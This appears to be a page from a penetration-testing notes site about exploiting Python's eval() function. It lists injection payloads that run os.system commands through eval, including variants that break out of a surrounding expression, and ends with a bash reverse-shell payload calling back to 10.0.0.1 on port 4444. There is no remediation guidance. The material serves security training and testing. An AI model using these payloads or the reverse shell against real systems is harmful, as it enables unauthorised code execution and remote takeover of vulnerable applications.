Python Eval Code Execution

Python's eval() method is vulnerable to arbitrary code execution.

Investigation

eval(text)
eval(f"5 + {num}")
Copied!

If the Python script allows us to input some value to the "text" variable, we can inject arbitrary code.

Arbitrary Code Execution

Most of the time, we need to bypass another expression to execute our desired command.

__import__('os').system('id')

<!-- Bypass another expression in eval -->
),__import__('os').system('id')
'),__import__('os').system('id')
},__import__('os').system('id')
),__import__('os').system('id')#
Copied!

Reverse Shell

__import__('os').system('bash -c "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"')

PreviousPolKit Privilege Escalation NextPython Jails Escape

Last updated 2 years ago

hashtagInvestigationarrow-up-right

hashtagArbitrary Code Executionarrow-up-right

hashtagReverse Shellarrow-up-right

Investigation

Arbitrary Code Execution

Reverse Shell